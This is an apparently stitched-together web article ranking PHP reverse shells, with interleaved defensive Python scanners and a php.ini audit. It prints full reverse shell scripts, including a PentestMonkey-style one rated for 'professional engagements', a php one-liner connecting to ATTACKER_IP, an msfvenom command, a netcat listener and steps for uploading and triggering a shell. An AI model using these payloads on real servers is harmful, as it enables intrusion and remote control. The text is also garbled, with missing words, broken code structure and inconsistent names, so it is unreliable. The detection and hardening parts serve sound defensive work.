Reverse Shell PHP Top

A PHP reverse shell is a common technique used by security professionals to gain remote command-line access to a server after exploiting a vulnerability. Because the target server initiates an outgoing connection to an attacker-controlled listener, the technique often bypasses inbound firewall restrictions.

Top PHP Reverse Shell Methods

The following are the most widely recognized scripts and one-liners for establishing a PHP reverse shell:

Understanding Reverse Shells in PHP

A reverse shell is a type of shell that allows an attacker to access a victim's computer or server from a remote location. Unlike a traditional shell, where the attacker connects to the victim, in a reverse shell the victim initiates the connection to the attacker. This technique is commonly used in penetration testing and by attackers to bypass network security measures.

Why Use Reverse Shells in PHP?

PHP, being one of the most widely used server-side scripting languages, is often targeted by attackers. A reverse shell in PHP can be particularly useful for attackers to gain access to a server when direct shell access is restricted. For security professionals, understanding how reverse shells work can help in developing better defense mechanisms.

Basic Concept

The basic concept of a reverse shell involves:

  1. The attacker sets up a listener on a specific port on their machine.
  2. The victim (in this case, a PHP script) initiates a connection to the attacker's listener.
  3. Once connected, the attacker can execute commands on the victim's machine through the established channel.

PHP Reverse Shell Example

Below is a basic example of a PHP reverse shell. Note: This should only be used for educational purposes or in a controlled environment with permission.

<?php
$ip = 'your_ip_address'; // IP address of the attacker
$port = 1234; // Listening port
// Create a socket
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock === false) 
    $error = socket_last_error();
    echo "socket_create() failed: $error\n";
 else 
    // Connect to the attacker's listener
    $result = socket_connect($sock, $ip, $port);
    if ($result === false) 
        $error = socket_last_error($sock);
        echo "socket_connect() failed: $error\n";
        socket_close($sock);
     else 
        // Make the shell
        $descriptorspec = array(
            0 => array("pipe", "r"),  // stdin
            1 => array("pipe", "w"),  // stdout
            2 => array("pipe", "w")   // stderr
        );
$process = proc_open("bash -i", $descriptorspec, $pipes);
if (is_resource($process)) 
            while (true) 
                $input = socket_read($sock, 1024);
                if ($input) 
                    fwrite($pipes[0], $input);
$output = fread($pipes[1], 1024);
                socket_write($sock, $output);
                $output = fread($pipes[2], 1024);
                socket_write($sock, $output);
proc_close($process);
socket_close($sock);
?>

Security Implications

This piece provides a high-level overview of reverse shells in PHP. For detailed technical knowledge, engaging with cybersecurity communities and professional training is recommended.
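The example script above pairs socket calls with proc_open(), and that pairing is what a defender can search uploaded or changed PHP files for. The following Python triage is an added example, not code from the original page; the function lists come from the scripts on this page, and the sample inputs are constructed fragments.

```python
import re

# Function families called by the scripts shown on this page.
NETWORK_CALLS = {"fsockopen", "pfsockopen", "socket_create", "socket_connect"}
PROCESS_CALLS = {"proc_open", "exec", "shell_exec", "system", "passthru"}

# Comments and string literals are blanked first so that a function name
# mentioned in a comment or printed as text does not count as a call.
STRIP_RE = re.compile(
    r"/\*.*?\*/|//[^\n]*|#[^\n]*|'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"", re.S)
# A plain function call: a name followed by "(", excluding method calls
# ("->name(", "::name(") and variables ("$name(").
CALL_RE = re.compile(r"(?<![\w$>:])([A-Za-z_]\w*)\s*\(")


def called_functions(php_source):
    """Return the lower-cased names of functions called in the source."""
    code = STRIP_RE.sub(" ", php_source)
    return {name.lower() for name in CALL_RE.findall(code)}


def triage(php_source):
    """Flag files that both open a network connection and spawn a process."""
    calls = called_functions(php_source)
    net, proc = sorted(calls & NETWORK_CALLS), sorted(calls & PROCESS_CALLS)
    verdict = "suspicious" if net and proc else "review" if net or proc else "no-match"
    return {"verdict": verdict, "network": net, "process": proc}


# Constructed inputs (fragments, not working scripts).
SAMPLE_CONNECT_BACK = r"""<?php
$s = fsockopen($host, $port);
$p = proc_open($cmd, $spec, $pipes);
"""
SAMPLE_THUMBNAIL = r"""<?php
// exec() was removed from this handler
$img = imagecreatefromjpeg($path);
echo 'system(ok)';
"""
SAMPLE_HEALTHCHECK = r"""<?php
$fp = fsockopen('db.internal', 3306);
"""

if __name__ == "__main__":
    for name in ("SAMPLE_CONNECT_BACK", "SAMPLE_THUMBNAIL", "SAMPLE_HEALTHCHECK"):
        print(name, triage(globals()[name]))
```

Name matching misses obfuscated or dynamically built calls, so `no-match` means nothing was found, not that the file is safe.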

Introduction

A reverse shell is a type of shell session where the target machine initiates a connection back to the attacking machine. Unlike a traditional bind shell, where an attacker connects to a listening port on the server, a reverse shell "reverses" the roles to bypass firewalls and Network Address Translation (IP masquerading), which typically block incoming connections but allow outgoing traffic. In the context of PHP, these scripts are common tools used by penetration testers to gain interactive access to a web server after discovering a file upload vulnerability or a remote code execution (RCE) flaw.

How PHP Reverse Shells Work

The core logic of a PHP reverse shell involves three main steps:

  1. Socket Creation: The script creates a network socket pointing to the attacker’s IP address and a specific port (e.g., 4444).
  2. Process Execution: The script spawns a shell process (on Linux or on Windows) using PHP functions like shell_exec() or proc_open().
  3. I/O Redirection: The script pipes the input from the network socket into the shell’s standard input (STDIN) and sends the shell’s output (STDOUT/STDERR) back through the socket to the attacker.

Popular Techniques and "Top" Implementations

Several "top" or industry-standard scripts are frequently used in security auditing:

The PentestMonkey Script: This is perhaps the most famous PHP reverse shell. It uses to create a robust bidirectional stream. It is highly reliable on Linux systems because it handles file descriptors manually to ensure the connection remains stable.

The One-Liner: For quick exploitation where space is limited, attackers use condensed commands. A common example uses to call a system-level tool like , effectively using PHP as a bridge to execute a native reverse shell command.

The Ivan Suchkov Script: A more modern, streamlined version of the classic reverse shell that focuses on simplicity and compatibility with various PHP versions.

Security Implications and Defense

The existence of these scripts highlights a critical security risk: if a web application allows an unauthorized user to execute PHP code, the entire server is compromised. To defend against these attacks, administrators should:

Disable Dangerous Functions: Use the disable_functions directive to block functions like shell_exec.

Egress Filtering: Configure firewalls to block all outgoing connections from the web server except to known, necessary services (like a database or an update server).

Input Validation: Ensure that file upload forms and URL parameters are strictly validated to prevent the initial injection of the malicious script.

Conclusion

While "reverse shell php" is a term often associated with malicious activity, understanding how these scripts function is vital for cybersecurity professionals. By mastering the mechanics of how PHP interacts with the underlying operating system, developers and sysadmins can build more resilient environments and better detect the early signs of a breach.

In the world of cybersecurity, a PHP Reverse Shell is a classic "connect-back" technique used by penetration testers (and unfortunately, bad actors) to gain remote command-line access to a web server. Unlike a standard connection where you "call" the server, a reverse shell forces the server to "call" you.

The "Anatomy" of the Attack

The story usually begins with an unrestricted file upload vulnerability.

The Entry Point: An attacker finds a spot on a website, like a profile picture uploader or a resume submission form, that doesn't properly check what kind of file is being uploaded.

The Payload: Instead of a JPG or a PDF, the attacker uploads a script like the famous PentestMonkey PHP Reverse Shell or Ivan Sincek’s version.

The Listener: On their own machine, the attacker starts a "listener" (usually via a tool like Netcat) to wait for an incoming connection.

The Execution: The attacker navigates to the URL where their file was uploaded (e.g., ://website.com). The server executes the PHP code, which opens a socket and sends a command prompt back to the attacker’s machine.

Popular PHP Reverse Shell "Top" Picks

If you are looking for the most reliable scripts used in the industry for educational and ethical testing:

PentestMonkey’s PHP Reverse Shell: Often considered the "gold standard," this script is included in the default Kali Linux web shells directory (/usr/share/webshells/php/).

Ivan Sincek’s PHP Reverse Shell: A modern, high-quality version that supports newer PHP versions (5.0+) and works across Linux, macOS, and even Windows.

The One-Liner: For quick execution when you have a tiny command injection window, this tiny snippet is a go-to:

php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Real-World Story: The Student Hacker

In a notable recent case from late 2025, security researchers identified a trend of "webshell underground" markets. One specific hacker, a student in Bangladesh, was reportedly using PHP backdoors to compromise WordPress and cPanel instances, selling access to these sites to pay for his education.


A PHP reverse shell is a script that, when executed on a target server, initiates a TCP connection back to an attacker's machine, providing a remote command-line interface.

Top PHP Reverse Shell Tools & Methods

Pentestmonkey's PHP Reverse Shell: This is the industry-standard script used for Linux-based targets. It is highly reliable and handles daemonization to ensure the connection persists even if the initial web request times out.

Ivan Sincek's PHP Reverse Shell: A modern, feature-rich version that supports both Linux and Windows. It includes web shell variants for situations where a full reverse shell is blocked by firewalls.

PHP One-Liners: Ideal for quick exploitation through command injection vulnerabilities.

Example: php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'.

Msfvenom Payloads: Part of the Metasploit Framework, msfvenom can generate obfuscated PHP payloads that are harder for antivirus to detect.

Command: msfvenom -p php/reverse_php LHOST=ATTACKER_IP LPORT=PORT > shell.php.

Standard Implementation Procedure

Preparation: Edit the chosen script (like Pentestmonkey's) to include your listening IP address and port.

Listener Setup: Start a listener on your machine to "catch" the connection using a tool like Netcat. Command: nc -lvnp

Deployment: Upload the .php file to the target server, typically via a file upload vulnerability or a Remote Code Execution (RCE) flaw.

Execution: Access the uploaded file via a web browser (e.g., http://target.com). This triggers the script to connect back to your listener, granting you a shell.

Detection and Prevention

Ingress Filtering: Implement strict file upload controls, such as whitelisting only safe extensions (e.g., .jpg, .png) and scanning uploaded files for malicious signatures.

Egress Filtering: Configure firewalls to block unauthorized outbound connections from web servers to the internet.

Disable Risky Functions: In the php.ini file, use the disable_functions directive to block functions often used by shells, such as exec(), shell_exec(), system(), and passthru().

Monitoring: Use security tools like Wiz or Invicti to detect unusual process spawning (e.g., www-data starting /bin/sh).
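An added example (not from the original page) that audits a php.ini against the disable_functions advice above: it reports which functions from the page's list, and which functions the example scripts on this page actually call, are still enabled. The php.ini samples are constructed.

```python
import re

# Functions the page recommends disabling.
PAGE_LIST = ("exec", "shell_exec", "system", "passthru")
# Functions the two example scripts on this page call to connect and spawn.
SCRIPT_CALLS = ("proc_open", "fsockopen", "socket_create", "socket_connect")


def disabled_functions(ini_text):
    """Return the set of function names disabled by a php.ini text."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # ';' starts a comment
        m = re.fullmatch(r"disable_functions\s*=\s*(.*)", line)
        if m:
            # The last assignment read is the one that takes effect.
            value = m.group(1).strip().strip("\"'")
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def audit(ini_text):
    """List the functions from each group that are still callable."""
    disabled = disabled_functions(ini_text)
    return {
        "page_list_enabled": [f for f in PAGE_LIST if f not in disabled],
        "script_calls_enabled": [f for f in SCRIPT_CALLS if f not in disabled],
    }


# Constructed php.ini samples.
INI_PAGE_ADVICE = """[PHP]
; hardening as listed on this page
disable_functions = exec, shell_exec, system, passthru
"""
INI_EMPTY = """[PHP]
disable_functions =
"""
INI_OVERRIDDEN = """[PHP]
disable_functions = exec,shell_exec,system,passthru,proc_open
; a later line, for example appended by a deployment script
disable_functions = exec
"""

if __name__ == "__main__":
    for name in ("INI_PAGE_ADVICE", "INI_EMPTY", "INI_OVERRIDDEN"):
        print(name, audit(globals()[name]))
```

With only the four functions listed above disabled, proc_open(), which both example scripts on this page use to start the shell, is still available.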


6. Advanced Techniques and Evasion

#1 The PenTestMonkey Classic (The Industry Standard)

This is the gold standard. It is stable, feature-rich, and handles edge cases like pfsockopen (persistent sockets) and TTY shell upgrades.

Features:

The Payload:

<?php
// Uses fsockopen for a reliable reverse shell
set_time_limit(0);
$ip = 'YOUR_IP'; // CHANGE THIS
$port = 4444;     // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) $pid = pcntl_fork(); if ($pid == -1) printit("ERROR: Can't fork"); exit(1); if ($pid) exit(0); if (posix_setsid() == -1) printit("Error: Can't setsid()"); exit(1); pcntl_fork(); else printit("Warning: pcntl_fork() not supported");

$sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) printit("$errstr ($errno)"); exit(1);

$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) printit("Error: proc_open failed"); exit(1);

stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0);

while (1) if (feof($sock)) printit("ERROR: Shell connection terminated"); break; if (feof($pipes[1])) printit("ERROR: Shell process terminated"); break; $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); if (in_array($pipes[1], $read_a)) $output = fread($pipes[1], $chunk_size); fwrite($sock, $output); if (in_array($pipes[2], $read_a)) $error_output = fread($pipes[2], $chunk_size); fwrite($sock, $error_output); proc_close($process); ?>

Rating: 10/10 – Use this for professional engagements.
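On the host, the proc_open() call in the script above appears as the web server's PHP worker starting `sh`, which then starts `/bin/sh -i`. The following Python detector is an added example, not part of the original page or of any tool named here; the JSON event fields, worker process names and sample events are assumptions constructed for illustration.

```python
import json
import os

WEB_WORKERS = ("php-fpm", "apache2", "httpd")   # assumed worker process names
SHELLS = {"sh", "bash", "dash"}


def detect(event_lines):
    """Alert on shells started by a web worker or by any of its descendants."""
    lineage = {}    # pid -> pid of the web worker it descends from
    alerts = []
    for line in event_lines:
        ev = json.loads(line)
        if ev["ppid"] in lineage:                     # child of a tracked process
            root = lineage[ev["ppid"]]
        elif ev["parent"].startswith(WEB_WORKERS):    # direct child of a worker
            root = ev["ppid"]
        else:
            continue
        lineage[ev["pid"]] = root
        if os.path.basename(ev["exe"]) in SHELLS:
            # "-i" as its own argument means an interactive shell was requested.
            kind = "interactive-shell" if "-i" in ev["argv"][1:] else "shell"
            alerts.append((ev["pid"], ev["user"], kind, root))
    return alerts


# Constructed process-start events in a hypothetical JSON-lines format.
SAMPLE_EVENTS = [json.dumps(e) for e in (
    {"pid": 2101, "ppid": 900, "user": "www-data", "parent": "php-fpm8.2",
     "exe": "/bin/sh", "argv": ["sh", "-c", "uname -a; w; id; /bin/sh -i"]},
    {"pid": 2102, "ppid": 2101, "user": "www-data", "parent": "sh",
     "exe": "/usr/bin/uname", "argv": ["uname", "-a"]},
    {"pid": 2105, "ppid": 2101, "user": "www-data", "parent": "sh",
     "exe": "/bin/sh", "argv": ["/bin/sh", "-i"]},
    {"pid": 3300, "ppid": 1, "user": "root", "parent": "cron",
     "exe": "/bin/sh", "argv": ["sh", "-c", "run-parts /etc/cron.daily"]},
)]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The non-interactive `shell` alerts also fire for legitimate applications that shell out, so they are a lower-priority signal than `interactive-shell`.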
